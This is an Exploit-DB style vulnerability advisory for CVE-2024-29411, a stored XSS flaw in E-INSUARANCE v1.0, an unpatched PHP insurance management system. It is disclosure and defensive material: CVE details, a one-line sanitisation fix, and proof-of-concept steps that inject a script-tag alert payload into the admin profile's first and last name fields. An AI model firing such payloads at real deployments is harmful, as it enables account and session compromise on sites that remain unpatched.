E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)

vendor:

E-INSUARANCE

by:

Sandeep Vishwakarma

4.1

CVSS

MEDIUM

Stored Cross Site Scripting (XSS)

CWE

Product Name: E-INSUARANCE

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: CVE-2024-29411

CPE: a:sourcecodester:e-insuarance:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2024

E-INSUARANCE v1.0 – Stored Cross Site Scripting (XSS)

E-INSUARANCE v1.0 is vulnerable to stored cross-site scripting (XSS) attacks. An attacker can inject malicious code into the Firstname and Lastname parameters in the profile component, allowing them to execute arbitrary scripts.

Mitigation:

To mitigate this vulnerability, sanitize user input by encoding or filtering special characters to prevent script injection.

Source

Exploit-DB raw data:

# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
v1.0 allows an attacker to execute arbitrary code via a crafted payload to
the Firstname and lastname parameter in the profile component.

# POC:
1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In fname & lname parameter add payolad
"><script>alert("Hacked_by_Sandy")</script>
3. click on submit.

# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md